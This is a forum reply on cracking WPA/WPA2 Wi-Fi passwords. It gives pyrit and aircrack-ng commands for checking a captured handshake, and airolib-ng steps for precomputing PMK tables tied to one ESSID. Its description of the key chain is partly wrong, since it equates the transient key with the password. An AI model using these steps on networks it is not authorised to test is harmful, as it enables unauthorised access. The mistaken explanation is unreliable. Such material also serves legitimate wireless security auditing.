Hmm hmm. Double check to ensure you have a complete 4 way handshake. You mentioned using pyrit so run this and tell us what you see.
- Code: Select all
pyrit -r <.cap file> analyze
As for you crack speeds, yes aircrack-ng is faster than pyrit (and cowpatty) running simple cracks. If you want to get some serious speed running your dictionaries (800k+/s) you need to create your own rainbow table with precomputed pairwise master keys (PMKs). Before I confuse you let me explain:
When you run aircrack-ng you will notice the output is broken into 3 parts; the first two are the main parts to focus on. The "Master Key" is the pairwise master key. It is derived from the ESSID using the pbkdf2 algorithm. Basically, it takes a long ass time to compute. This is the very reason it takes so long to crack WPA(2) encryptions.
The basic process:
Word from dictionary + encryption algorithm > PMK > Private Transient Key (PTK, aka: the password) > plain text password
This has to be done for every single entry in your dictionary. Now, what I mentioned before. The PMKs are always the same so why waste the time in computing them for every single entry if you don't have to? There is one downside to this method that you should know. Precomputing a PMK from your dictionaries and saving them to a table is a VERY slow process. However, once it is done it is done. That said, this rainbow table will only work on handshakes that were captured with the same ESSID that you used. To the blackhats out there this will waste your time.
- Code: Select all
# echo <ESSID> > targetessid.txt
# airolib-ng <database name> --import essid targetessid.txt
# airolib-ng <database name> --import passwd <wordlist>
# airolib-ng <database name> --batch
# airolib-ng <database name> --stats (ensure 100%)
# aircrack-ng -r <database name> <.cap>
But, I got side tracked. Tell us if you have a genuine 4way first.